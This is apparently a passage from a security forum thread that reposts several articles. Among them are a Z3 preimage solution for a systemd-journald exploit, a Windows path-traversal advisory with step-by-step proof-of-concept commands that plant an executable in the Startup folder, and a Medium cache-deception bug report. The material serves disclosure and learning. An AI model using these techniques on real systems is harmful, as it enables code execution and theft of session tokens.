32) b = BitVecVal(initial_value, 32) c = BitVecVal(initial_value, 32) Note: The *pc component of the initialization will always be 0, as it’s initialized to 0 in the hash64() function, which is what’s actually called on our input. We can ignore the alignment checks the hash function does (as we aren’t actually dereferencing anything in Z3). We can also skip past the while (length > 12) loop, and start in the case 12 as our length is hard-coded to be 12. Thus the first bit of code we need to implement is from inside the switch block on the length, at case 12, which adds the three parts of the key to a, b, and ? a += Extract(31, 0, key) b += Extract(63, 32, key) c += Extract(95, 64, key) Since key is just an vector of bits from the perspective of Z3, in the above code we just Extract the first, second, and third uint32_t – there’s no typecasting to do. Following the C source, we next need to implement the final macro, which does the final state mixing to produce the hash output. Looking at the source, it uses another macro (rot), but this is just a simple rotate left operation. Z3 has rotate left as a primitive function, so we can make our lives easy by adding an import to our Python: from z3 import RotateLeft as rot And then we can simply paste in the macro definition verbatim (well, minus the line-continuation characters): c ^= b; c -= rot(b, 14) a ^= c; a -= rot(c, 11) b ^= a; b -= rot(a, 25) c ^= b; c -= rot(b, 16) a ^= c; a -= rot(c, 4) b ^= a; b -= rot(a, 14) c ^= b; c -= rot(b, 24) At this point, the variables a, b, and c contain equations which represent their state when the hash function is about to return. From the source, hash64() combines the b and c out arguments to produce the final 64-bit hash. So we can simply add constraints to our model to denote that b and c are equal to their respective halves of the 64-bit output we want: s.add(b == (target & 0xffffffff)) s.add(c == (target >> 32)) All that’s left at this point is to check the state for satisfiability: s.check() Get our actual preimage value from the model: preimage = s.model()[key].as_long() And transform it into a string: input_str = preimage.to_bytes(12, byteorder='little').decode('ascii') With that, our exploit from part 1 is now fully explained, and can be used on any system where the addresses of libc and the stack are constant (i.e. systems which have ASLR disabled). Conclusion Z3 is a very powerful toolkit that can be used to solve a number of problems in exploit development. This blog post has only scratched the surface of its capabilities, but as we’ve seen, even basic Z3 operations can be used to trivially solve complex problems. Read Part One of this series Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-2/
      • 1
      • Upvote
  12. Wednesday, February 6, 2019 Remote LIVE Memory Analysis with The Memory Process File System v2.0 This blog entry aims to give an introduction to The Memory Process File System and show how easy it is to do high-performant memory analysis even from live remote systems over the network. This and much more is presented in my BlueHatIL 2019 talk on February 6th. Connect to a remote system over the network over a kerberos secured connection. Acquire only the live memory you require to do your analysis/forensics - even over medium latency/bandwidth connections. An easy to understand file system user interface combined with continuous background refreshes, made possible by the multi-threaded analysis core, provides an interesting new different way of performing incident response by live memory analysis. Analyzing and Dumping remote live memory with the Memory Process File System. The image above shows the user staring MemProcFS.exe with a connection to the remote computer book-test.ad.frizk.net and with the DumpIt live memory acquisition method. it is then possible to analyze live memory simply by clicking around in the file system. Dumping the physical memory is done by copying the pmem file in the root folder. Background The Memory Process File System was released for PCILeech in March 2018, supporting 64-bit Windows, and was used to find the Total Meltdown / CVE-2018-1038 page table permission bit vulnerability in the Windows 7 kernel. People have also used it to cheat in games - primarily cs:go using it via the PCILeech API. The Memory Process File System was released as a stand-alone project focusing exclusively on memory analysis in November 2018. The initial release included both APIs and Plugins for C/C++ and a Python. Support was added soon thereafter for 32-bit memory models and Windows support was expanded as far back as Windows XP. What is new? Version 2.0 of The Memory Process File System marks a major release that was released in conjunction with the BlueHatIL 2019 talk Practical Uses for Hardware-assisted Memory Visualization. New functionality includes: A new separate physical memory acquisition library - the LeechCore. Live memory acquisition with DumpIt or WinPMEM. Remote memory capture via a remotely running LeechService. Support from Microsoft Crash Dumps and Hyper-V save files. Full multi-threaded support in the memory analysis library. Major performance optimizations. The combination live memory capture via Comae DumpIt, or the less stable WinPMEM, and secure remote access may be interesting both for convenience and incident-response. It even works remarkably well over medium latency- and bandwidth connections. The LeechCore library The LeechCore library, focusing exclusively on memory acquisition, is released as a standalone open source project as a part of The Memory Process File System v2 release. The LeechCore library abstracts memory acquisition from analysis and makes things more modular and easier to re-use. The library supports multiple memory acquisition methods - such as: Hardware: USB3380, PCILeech FPGA and iLO Live memory: Comae DumpIt and WinPMEM Dump files: raw memory dump files, full crash dump files and Hyper-V save files. The LeechCore library also allows for transparently connecting to a remote LeechService running on a remote system over a compressed mutually authenticated RPC connection secured by Kerberos. Once connected any of the supported memory acquisition methods may be used. The LeechService The LeechService may be installed as a service with the command LeechSvc.exe install. Make sure all necessary dependencies are in the folder of leechsvc.exe - i.e. leechcore.dll and winpmem_x64.sys (if using winpmem). The LeechService will write an entry, containing the kerberos SPN to the application event log once started provided that the computer is a part of an Active Directory domain. The LeechService is installed and started with the Kerberos SPN: book-test$@AD.FRIZK.NET Now connect to the remote LeechService with The Memory Process File System - provided that the port 28473 is open in the firewall. The connecting user must be an administrator on the system being analyzed. An event will also be logged for each successful connection. In the example below winpmem is used. Note that winpmem may unstable on recent Windows 10 systems. Securely connected to the remote system - acquiring and analyzing live memory. It's also possible to start the LeechService in interactive mode. If starting it in interactive mode it can be started with DumpIt to provide more stable memory acquisition. It may also be started in insecure no-security mode - which may be useful if the computer is not joined to an Active Directory domain. Using DumpIt to start the LeechSvc in interactive insecure mode. If started in insecure mode everyone with access to port 28473 will be able to connect and capture live memory. No logs will be written. The insecure mode is not available in service mode. It is only recommended in secure environments in which the target computer is not domain joined. Please also note that it is also possible to start the LeechService in interactive secure mode. To connect to the example system from a remote system specify: MemProcFS.exe -device dumpit -remote rpc://insecure:<address_of_remote_system> How do I try it out? Yes! - both the Memory Process File System and the LeechService is 100% open source. Download The Memory Process File System from Github - pre-built binaries are found in the files folder. Also, follow the instructions to install the open source Dokany file system. Download the LeechService from Github - pre-built binaries with no external dependencies are found in the files folder. Please also note that you may have to download Comae DumpIt or WinPMEM (latest release, install and copy .sys driver file) to acquire live memory. The Future Please do keep in mind that this is a hobby project. Since I'm not working professionally with this future updates may take time and are also not guaranteed. The Memory Process File System and the LeechCore is already somewhat mature with its focus on fast, efficient, multi-threaded live memory acquisition and analysis even though current functionality is somewhat limited. The plan for the near future is to add additional core functionality - such as page hashing and PFN database support. Page hashing will allow for more efficient remote memory acquisition and better forensics capabilities. PFN database support will strengthen virtual memory support in general. Also, additional and more efficient analysis methods - primarily in the form of new plugins will also be added in the medium future. Support for additional operating systems, such as Linux and macOS is a long-term goal. It shall however be noted that the LeechCore library is already supported on Linux. Posted by Ulf Frisk at 2:35 PM Sursa: http://blog.frizk.net/2019/02/remote-live-memory-analysis-with-memory.html
      • 1
      • Upvote
  13. Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard Lee Christensen Feb 6 Summary Attackers can use the .devicemanifest-ms and .devicemetadata-ms file extensions for remote code execution in phishing scenarios when the Windows Driver Kit is installed on a victim’s machine. This is possible because the Windows Driver Kit installer installs the Device Metadata Authoring Wizard and associates the .devicemanifest-ms and .devicemetadata-ms file extensions with the program DeviceMetadataWizard.exe. When a victim user opens a maliciously crafted .devicemanifest-ms or .devicemetadata-ms file, an attacker can abuse a path traversal vulnerability in DeviceMetadataWizard.exe to place a file in any writeable directory accessible by the victim user. Writing to certain paths can result in arbitrary code execution (e.g. the user’s Startup folder). Technical Details The .devicemanifest-ms and .devicemetadata-ms file extensions are registered on machines where the Device Metadata Authoring Wizard is installed. This application is part of the Windows Driver Kit and is installed by default on the Azure Visual Studio Community template VMs. It may also be installed when certain features are enabled during the Visual Studio installation process. The program DeviceMetadataWizard.exe handles files with this extension, as seen in the screenshot below showing the file extension association in the registry: Underneath, the .devicemanifest-ms and .devicemetadata-ms files are cabinet files. When a user opens one of these files, DeviceMetadataWizard.exe automatically extracts their contents into the current user’s temp folder. DeviceMetadataWizard.exe’s cabinet extraction is vulnerable to path traversal due to concatenation of the temporary directory’s path with file names in the cabinet file. An attacker can create a malicious cabinet file containing a file whose name contains relative path specifiers (e.g. ..\..\..\file.txt). When a victim user clicks on the malicious .devicemanifest-ms or .devicemetadata-ms file and DeviceMetadataWizard.exe opens, DeviceMetadataWizard.exe will automatically extract the cabinet file and the files inside the cabinet archive will be concatenated with the temporary directory’s path. If a file in the cabinet archive contains relative path specifiers, then DeviceMetadataWizard.exe will extract the files to an unintended location. As .devicemanifest-ms and .devicemetadata-ms are not subject to Mark of the Web and therefore not protected by SmartScreen, the file types are candidates for use in targeted phishing attacks. Proof of Concept In cmd.exe: copy C:\windows\system32\cmd.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe makecab.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe out.devicemanifest-ms Now, in your favorite text/hex editor, open out.devicemanifest-ms and replace the string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe” with “..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAAAAAAAAAAA.exe” Double click on out.devicemanifest-ms Expected Result Upon double clicking out.devicemanifest-ms, the file type should fail to load. All embedded files are safely extracted to the temp folder and deleted upon the exit of DeviceMetadataWizard.exe. Actual Result: Upon double clicking out.devicemanifest-ms, the file fails to load, but DeviceMetadataWizard.exe writes the file “AAAAAAAAAAAA.exe” to the folder C:\users\<user>\appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ AAAAAAAAAAAA.exe. Prevention and Detection Guidance Only users with the Windows Driver Kit installed are affected by this vulnerability (likely developers). Therefore, the overall attack surface is fairly limited. In terms of prevention, it’s very likely that developers do not even use the Device Metadata Authoring Wizard. Therefore, consider removing this tool if it’s not in use. To reduce the impact of this vulnerability on machines where the tool is used, consider removing the .devicemanifest-ms and .devicemetadata-ms file association handlers by deleting the following registry keys: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.devicemetadata-ms HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.devicemanifest-ms Also consider blacklisting the .devicemanifest-ms and .devicemetadata-ms file types using your email and web content filtering appliances. If you have an application whitelisting solution in place, the likelihood of exploitation is greatly decreased as an attacker would need to leverage an application whitelisting bypass in order to gain arbitrary code execution. In terms of host-based detections, baseline the normal behavior of DeviceMetadataWizard.exe in your environment and alert on anomalous file writes. In particular, baseline the typical folders where certain file extensions are written (e.g. is it common for any other file extension besides .devicemanifest-ms and .devicemetadata-ms, to be written outside of the %TEMP% folder?). Disclosure Timeline As committed as SpecterOps is to transparency, we acknowledge the speed at which attackers adopt new offensive techniques once they are made public. This is why prior to publication of a new bug or offensive technique, we regularly inform the respective vendor of the issue, supply ample time to mitigate the issue, and notify select, trusted vendors in order to ensure that detections can be delivered to their customers as quickly as possible. September 25, 2018 — Initial report to MSRC September 27, 2018 — Report acknowledgement received from MSRC and case number assigned October 4, 2018 — MSRC sends email stating they’re investigating how to address the issue. December 18, 2018 — Send email asking for an update. December 18, 2018 — MSRC responds saying they’re still figuring out how to address the issue. December 19, 2018 — MSRC notified that a blog post is written and will be released at the beginning of the year. Replied asking if it will be patched by then. December 19, 2018 — MSRC states it likely won’t be patched by January and asks to review blog post. Holiday break January 21, 2019 — MSRC follows up about the blog post. January 23, 2019 — Responded with blog posts January 23, 2019 — MSRC responds and says it will distribute the post applicable team members. January 30, 2019 — Inform MSRC that of plan to release post on February 6 and ask for if there’s any additional information about the timeline for a patch. January 30, 2019 — MSRC states that the release date should be okay and that they are still actively discussing the issue and will get back to me in 24 hours. January 30, 2019 — MSRC states that they plan to fix the issue in a future version of the Windows Driver Kit, but older versions will remain vulnerable since there is no update mechanism for the Windows Driver Kit. MSRC also states that the Windows Defender team has reviewed the post and is considering mitigation options. Sursa: https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f
  14. httpreplay Replay HTTP and HTTPS requests from a PCAP based on TLS Master Secrets. The TLS Master Secrets can be extracted through mitmproxy, Cuckoo Sandbox, some browsers, and probably some other tools as well. Sursa: https://github.com/hatching/httpreplay
  15. Open sourcing ClusterFuzz Thursday, February 7, 2019 Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications. Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability. In order for fuzzing to be truly effective, it must be continuous, done at scale, and integrated into the development process of a software project. To provide these features for Chrome, we wrote ClusterFuzz, a fuzzing infrastructure running on over 25,000 cores. Two years ago, we began offering ClusterFuzz as a free service to open source projects through OSS-Fuzz. Today, we’re announcing that ClusterFuzz is now open source and available for anyone to use. We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. ClusterFuzz provides end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports. ClusterFuzz has found more than 16,000 bugs in Chrome and more than 11,000 bugs in over 160 open source projects integrated with OSS-Fuzz. It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day. Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions. In production, ClusterFuzz depends on some key Google Cloud Platform services, but you can use your own compute cluster. We welcome your contributions and look forward to any suggestions to help improve and extend this infrastructure. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows. By Abhishek Arya, Oliver Chang, Max Moroz, Martin Barbella and Jonathan Metzman, ClusterFuzz team Sursa: https://opensource.googleblog.com/2019/02/open-sourcing-clusterfuzz.html
  16. Cache Deception: How I discovered a vulnerability in Medium and helped them fix it Yuval Shprinz Feb 6 I drew that masterpiece myself In my previous post, I tried to demonstrate how powerful and cool reverse engineering Android apps can be. I did this by showing how to modify Medium’s app so all membership-required stories in it would be available for free. Well, there was a bit more to the story :) While working towards my desired goal, I found a large collection of API endpoints that Medium declared in their code, which exposed a neat Cache Deception vulnerability after a short iteration on them. I was especially excited about that find because cache-based attacks are exceptionally awesome, and it could have been a great addition to my story. Unfortunately, it took Medium three months and a couple of reminders to respond, so I had to wait with the public disclosure for a bit. In this post, I will try to explain intuitively what Cache Deception is, describe the bug at Medium, and reference two outstanding articles about cache-based attacks. Cache Deception Web browsers cache servers’ static responses so they won’t need to request them again — saving both time and bandwidth. In a similar principle, servers and CDNs (Content delivery networks, Cloudflare for example) cache responses too (their own responses), so they won’t need to waste time processing them again. Instead of passing to the server a request that the CDN already knows its response to (i.e. a static image), it can return a response immediately to the client and reduce both server load and response time. When servers cache static responses, everyone benefits from it. But what happens when a server caches a non-static response that contains some sensitive information? The server will start serving the cached response to everyone from now on, hence making any sensitive information in it public! So that’s basically what Cache Deception is — making servers cache sensitive data, by exploiting badly configured caching rules. After the sensitive data is cached, an attacker can come back to hoard it, for example. Caching User Profiles Medium uses the library Retrofit to turn their HTTP APIs into Java interfaces for their Android app, so basically every endpoint lies nicely in their code with all of its available parameters specified. I extracted all of them to a list that ended up being about 900 endpoints. Some extracted endpoints That list was a real treasure, so I couldn’t stop myself from spending some time iterating it. Among other things, I looked for URLs that ended with user controlled input, because there is a common miss-configuration of caching services to cache every resource path that looks like a file. Remember, our goal is to find endpoints that both contain sensitive information and are cached by Medium’s servers. So, finding an API endpoint that’s being cached would be great. As it turned out, Medium indeed cached paths that looked like files by default, but only for resources that were right under the root directory of the site, URLs like https://medium.com/niceImage.png. Fortunately, my beautiful list contained one endpoint that held the above requirements — user profile pages. By setting my username to “yuval.png”, my profile page URL became https://medium.com/@yuval.png, and when someone visited it, its response was cached there for a while (4 hours, then the server dropped it). And that was actually the whole bug, setting usernames to end with a file extension -in order to cause profile pages to be cached. What sensitive information can be extracted from cached responses of visits to my profile page? CSRF tokens. Those are embedded in the returned document. (Cross-Site Request Forgery in simple words) Information about who viewed my profile. The currently logged in user can also be extracted from returned documents. The fact that each cached response was there for 4 hours and blocked other responses from being cached wasn’t a problem, because by using a simple script usernames can be changed repeatedly (and generate new URLs that aren’t cached yet). Note that this bug could have also been used by users that were willing to hide the “block user” option on their own profile page, if they repeatedly entered it (again, using a script). This would work because users don’t have the option to block themselves on their own profile and so others wouldn’t have it either when they receive a cached response that was created for the account owner. Report Timeline I sent Medium my report through their bug bounty program, and here’s the timeline: Aug 24 — Sent my initial report, and received an automatic email which said that Medium would try to get back to me within 48 hours. Sep 14 — Checked with them if something wasn’t clear since they hadn’t responded yet. Nov 1 — Issued another message, saying was fine with me if my report got rejected, and asking for a response so I would know they received it. Nov 20 — Response from Medium! apologizing for the delay and rewarding my bug with $100 and a shirt. I guess it took them a while because Cache Deception isn’t the usual kind of bug people report — but I was just hoping for a quick response asking me for more explanation or something. I assumed no one was reading their inbox. P.S. the bug was rewarded only $100 because Medium’s program is small, not because it’s lame :P Cache Based Attacks — Further Readings Cache-based attacks have been known for a long time, but were considered mostly theoretical until the recent publish of two outstanding works by Omer Gil and James Kettle. If you find the subject interesting, don’t miss these: Web Cache Deception Attack — Omer Gil, Feb 2017 While demonstrating it on PayPal, Omer claims the term Cache Deception for this new and amazing attack vector. Practical Web Cache Poisoning — James Kettle, Aug 2018 Cache Poisoning has been known for years, but by publishing his extensive research James made it practical. Check out his follow up article on the subject “Bypassing Web Cache Poisoning Countermeasures” too. See you next time… Yuval Shprinz Cybersecurity hobbyist, university student, Age of Mythology pro Sursa: https://medium.freecodecamp.org/cache-deception-how-i-discovered-a-vulnerability-in-medium-and-helped-them-fix-it-31cec2a3938b
  17. Introducing Adiantum: Encryption for the Next Billion Users February 7, 2019 Posted by Paul Crowley and Eric Biggers, Android Security & Privacy Team Storage encryption protects your data if your phone falls into someone else's hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted. Today, Android offers storage encryption using the Advanced Encryption Standard (AES). Most new Android devices have hardware support for AES via the ARMv8 Cryptography Extensions. However, Android runs on a wide range of devices. This includes not just the latest flagship and mid-range phones, but also entry-level Android Go phones sold primarily in developing countries, along with smart watches and TVs. In order to offer low cost options, device manufacturers sometimes use low-end processors such as the ARM Cortex-A7, which does not have hardware support for AES. On these devices, AES is so slow that it would result in a poor user experience; apps would take much longer to launch, and the device would generally feel much slower. So while storage encryption has been required for most devices since Android 6.0 in 2015, devices with poor AES performance (50 MiB/s and below) are exempt. We've been working to change this because we believe that encryption is for everyone. In HTTPS encryption, this is a solved problem. The ChaCha20 stream cipher is much faster than AES when hardware acceleration is unavailable, while also being extremely secure. It is fast because it exclusively relies on operations that all CPUs natively support: additions, rotations, and XORs. For this reason, in 2014 Google selected ChaCha20 along with the Poly1305 authenticator, which is also fast in software, for a new TLS cipher suite to secure HTTPS internet connections. ChaCha20-Poly1305 has been standardized as RFC7539, and it greatly improves HTTPS performance on devices that lack AES instructions. However, disk and file encryption present a special challenge. Data on storage devices is organized into "sectors" which today are typically 4096 bytes. When the filesystem makes a request to the device to read or write a sector, the encryption layer intercepts that request and converts between plaintext and ciphertext. This means that we must convert between a 4096-byte plaintext and a 4096-byte ciphertext. But to use RFC7539, the ciphertext must be slightly larger than the plaintext; a little space is needed for the cryptographic nonce and message integrity information. There are software techniques for finding places to store this extra information, but they reduce efficiency and can impose significant complexity on filesystem design. Where AES is used, the conventional solution for disk encryption is to use the XTS or CBC-ESSIV modes of operation, which are length-preserving. Currently Android supports AES-128-CBC-ESSIV for full-disk encryption and AES-256-XTS for file-based encryption. However, when AES performance is insufficient there is no widely accepted alternative that has sufficient performance on lower-end ARM processors. To solve this problem, we have designed a new encryption mode called Adiantum. Adiantum allows us to use the ChaCha stream cipher in a length-preserving mode, by adapting ideas from AES-based proposals for length-preserving encryption such as HCTR and HCH. On ARM Cortex-A7, Adiantum encryption and decryption on 4096-byte sectors is about 10.6 cycles per byte, around 5x faster than AES-256-XTS. Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa. It works by first hashing almost the entire plaintext using a keyed hash based on Poly1305 and another very fast keyed hashing function called NH. We also hash a value called the "tweak" which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction. This is arranged in a configuration known as a Feistel network, so that we can decrypt what we've encrypted. A single AES-256 invocation on a 16-byte block is also required, but for 4096-byte inputs this part is not performance-critical. Cryptographic primitives like ChaCha are organized in "rounds", with each round increasing our confidence in security at a cost in speed. To make disk encryption fast enough on the widest range of devices, we've opted to use the 12-round variant of ChaCha rather than the more widely used 20-round variant. Each round vastly increases the difficulty of attack; the 7-round variant was broken in 2008, and though many papers have improved on this attack, no attack on 8 rounds is known today. This ratio of rounds used to rounds broken today is actually better for ChaCha12 than it is for AES-256. Even though Adiantum is very new, we are in a position to have high confidence in its security. In our paper, we prove that it has good security properties, under the assumption that ChaCha12 and AES-256 are secure. This is standard practice in cryptography; from "primitives" like ChaCha and AES, we build "constructions" like XTS, GCM, or Adiantum. Very often we can offer strong arguments but not a proof that the primitives are secure, while we can prove that if the primitives are secure, the constructions we build from them are too. We don't have to make assumptions about NH or the Poly1305 hash function; these are proven to have the cryptographic property ("ε-almost-∆-universality") we rely on. Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion. Additional resources The full details of our design, and the proof of security, are in our paper Adiantum: length-preserving encryption for entry-level processors in IACR Transactions on Symmetric Cryptology; this will be presented at the Fast Software Encryption conference (FSE 2019) in March. Generic and ARM-optimized implementations of Adiantum are available in the Android common kernels v4.9 and higher, and in the mainline Linux kernel v5.0 and higher. Reference code, test vectors, and a benchmarking suite are available at https://github.com/google/adiantum Android device manufacturers can enable Adiantum for either full-disk or file-based encryption on devices with AES performance <= 50 MiB/sec and launching with Android Pie. Where hardware support for AES exists, AES is faster than Adiantum; AES must still be used where its performance is above 50 MiB/s. In Android Q, Adiantum will be part of the Android platform, and we intend to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms. Acknowledgements: This post leveraged contributions from Greg Kaiser and Luke Haviland. Adiantum was designed by Paul Crowley and Eric Biggers, implemented in Android by Eric Biggers and Greg Kaiser, and named by Danielle Roberts. Sursa: https://security.googleblog.com/2019/02/introducing-adiantum-encryption-for.html
  18. Over the past couple of weeks I’ve been doing a lot of CTFs (Capture the Flag) - old and new. And I honestly can’t believe what I’ve been missing out on. I’ve learned so much during this time by just playing the CTFs, reading write-ups, and even watching the solutions on YouTube. This allowed me to realize how much I still don’t know, and allowed me to see where the gaps in my knowledge were. One of the CTFs that was particularly interesting to me was the Google CTF. The reason why I really liked Google’s CTF was because it allowed for both beginners and experts to take part, and even allowed people new to CTF’s to try their hands at some security challenges. I opted to go for the beginner challenges to see where my skill level really was at - and although it was “mostly” easy, there were still some challenges that had me banging my head on the desk and Googling like a mad man. Even though the Google CTF was over and solutions were online, I avoided them at all costs because I wanted to learn the “hard way”. These beginner challenges were presented in a “Quest” style with a scenario similar to a real world penetration test. Such a scenario is awesome for those who want to sharpen their skills, learn something new about CTFs and security, while also allowing them to see a real world value and impact. Now, some of you might be wondering… “How much do I need to know or learn to be able to do a CTF?” or “How hard are CTFs? Truth be told, it depends. Some CTFs can be way more complex than other, such as DEFCON’s CTF and even Google’s CTF can be quite complex and complicated - but not impossible! It solely depends on your area of expertise. There are many CTF teams that have people who specialize in Code Review and Web Apps and can do Web Challenges with their eyes closed, but give them a binary and they won’t know there difference between the EIP and ESP. The same goes for others! Sure, there are people who are the “Jack of All Trades” and can do pretty much anything, but that doesn’t make them an expert in everything. After reading this, you might be asking me - But I’ve never done a CTF before! How do I know if I’m ready to attempt one? Honestly, you’ll never be ready! There will always be something new to learn, something new you have never seen before, or something challenging that pushes the limits of your knowledge, even as an expert! That’s the whole point of CTFs. But, there are resources that can help you get started! Let’s start by explaining what a CTF really is! CTF Time does a good job at explaining the basics, so I’m just going to quote them (with some “minor” editing)! Capture the Flag (CTF) is a special kind of information security competitions. There are three common types of CTFs: Jeopardy, Attack-Defense and mixed. Jeopardy-style CTFs has a couple of questions (tasks) in range of categories. For example, Web, Forensic, Crypto, Binary, PWN or something else. Teams compete against each other and gain points for every solved task. The more points for a task, the more complicated the task. Usually certain tasks appear in chains, and can only be opened after someone on the team solves the previous task. Once the competition is over, the team with the highest amount of points, wins! Attack-defense is another interesting type of competition. Here every team has their own network (or only one host) with vulnerable services. Your team has time for patching and usually has time for developing exploits against these services. Once completed, organizers connects participants of the competition to a single network and the wargame starts! Your goal is to protect your own services for defense points and to hack your opponents for attack points. Some of you might know this CTF if you ever competed in the CCDC. Mixed competitions may contain many possible formats. They might be a mix of challenges with attack/defense. We usually don’t see much of these. Such CTF games often touch on many other aspects of security such as cryptography, steganography, binary analysis, reverse engineering, web and mobile security and more. Good teams generally have strong skills and experience in all these issues, or contain players who are well versed in certain areas. LiveOverflow also has an awesome video explaining CTFs along with examples on each aspect - see below! Overall, CTFs are time games where hackers compete agasint eachother (either in teams or alone) to find bugs and solve puzzles to find “flags” which count for points. The team with the most points at the end of the CTF is the winner! Now that we have a general idea of what a CTF is and what it contains, let’s learn how we can get started in playing CTFs! Once again, LiveOverflow has an amazing video explaining why CTF’s are a great way to learn hacking. This video was a live recording of his FSEC 2017 talk that aimed to “motivate you to play CTFs and showcase various example challenge solutions, to show you stuff you hopefully haven’t seen before and get you inspired to find more interesting vulnerabilities”. There are also a ton of resources online that aim to teach you the basics of Vulnerability Discovery, Binary Exploitation, Forensics, and more, such as the following below: CTF Field Guide CTF Resources Endgame - How To Get Started In CTF CONFidence 2014: On the battlefield with the Dragons – G. Coldwind, M. Jurczyk If You Can Open The Terminal, You Can Capture The Flag: CTF For Everyone So You Want To Be a Pentester? <– Shameless plug because of resources! ? Out of all these resources, I believe that CTF Series: Vulnerable Machines is honestly the BEST resources for CTFs. It’s aim is mostly focused on how to approach Vulnerable VM’s like the ones on VulnHub and Hack The Box, but it still gives you a ton of example and resources on how to find certain vulnerabilities, how to utilized given tools, and how to exploit vulnerabilities. As I said time and time again, learning the basics will drastically help improve your CTF skills. Once you get enough experience you’ll start to notice “patterns” in certain code, binaries, web apps, etc. which will allow you to know if a particular vulnerability exists and how it can be exploited. Another thing that can help you prepare for CTFs is to read write-ups on new bugs and vulnerabilities. A ton of Web CTF challenges are based off of these bugs and vulnerabilities or are a variant of them - so if you can keep up with new findings and understand them, then you’re ahead of the curve. The following links are great places to read about new bugs, and vulnerabilities. They are also a good place to learn how other’s exploited known bugs. HINT: These links can also help you get into Bug Bounty Hunting! Hackerone - Hacktivity Researcher Resources - Bounty Bug Write-ups Orange Tsai Detectify Blog InfoSec Writeups Pentester Land - Bug Bounty Writeups The Daily Swig - Web Security Digest Once we have a decent understanding of a certain field such as Web, Crypto, Binary, etc. it’s time we start reading and watching other people’s writeups. This will allow us to gain an understanding on how certain challenges are solved, and hopefully it will also teach us a few new things. The following links are great places to read and watch CTF solutions: CTF Time - Writeups CTFs Github - Writeups, Resources, and more! Mediunm - CTF Writeups LiverOverflow Youtube Gynvael Coldwind Murmus CTF John Hammond Now that you have the basics skills and know a little more about certain topics it’s time we find a CTF! CTF Time is still one of the best resources for looking at upcoming events that you can participate in. You can go through the events and see what interests you! Once you choose something, follow the instruction to register and you’re done! From there, all you need to do is just wait for the CTF to start, and hack away! Okay, seems easy enough - but then again for a first time it’s still overwhelming! So what can we do to make our first CTF experience a good one? Well, that’s where the Google CTF comes in! As I stated before, the reason why I really liked Google’s CTF was because it allowed for both beginners and experts to take part, and even allowed people new to CTF’s to try their hands at some security challenges without adding too much pressure. The Beginner Quest starts off with a little back story to “lighten” the mood and let the player know that, this is just a game. We aren’t competing for a million dollars, so take it easy and have fun! The story is as follows: Once we read the story, we can start with the challenges. These beginner challenges were presented in a “Quest” style based off the story scenario. The quest has a total of nineteen (19) challenges as shown below in the quest map - with each color representing a different category as follows: Purple: Miscellaneous Green: Exploitation/Buffer Overflows & Reverse Engineering Yellow: Reverse Engineering Blue: Web Exploitation If you click on one of the circles then you will go to the respective challenge. The challenge will contain some information, along with either an attachment or a link. From there, try to solve the challenge and find the flag, which is in the CTF{} format. Submitting the correct flag will complete the challenge. Now notice how some of these challenges are “grayed out”. That’s because these challenges are “chained” to one another, meaning that you need to complete the previous one to be able to open the path to the next challenge. Also notice that Google allows you to make choices on what challenge you want to do. They don’t force you to do all of them to get to the END, but give you the ability to pick and choose another path if something is too hard. Thus, making it easier for you to feel accomplishment and to later come back and learn! Alright, that’s it for now. Hopefully you learned something new today and I sincerely hope that the resources will allow you to learn and explore new topics! The posts following this will detail how I solved the 2018 Google CTF - Beginners Quest, so stay tuned and I hope to see you on the CTF battlefield someday! Updated: February 06, 2019 Jack Halon I like to break into things; both physically and virtually. Sursa: https://jhalon.github.io/2018-google-ctf-beginners-intro/
      • 7
      • Upvote
      • Thanks
  19. V-ati inscris? Pentru cei care nu stiu despre ce este vorba: 1. Este un concurs de CTF 2. Participa multe tari din Europa 3. Dupa etapa de calificari se vor alege 20-30 de persoane care vor merge la un bootcamp - Un security training de o saptamana cu multe altele (merita!) 4. Dintre acele persoane se vor alege 10 (aproximativ) care vor reprezenta Romania la ECSC Daca la fotbal nu suntem buni si nationala nu joaca nimic de ani, macar la security sa le demnstram tuturor ca ne pricepem.
  20. Nytro

    unicorn

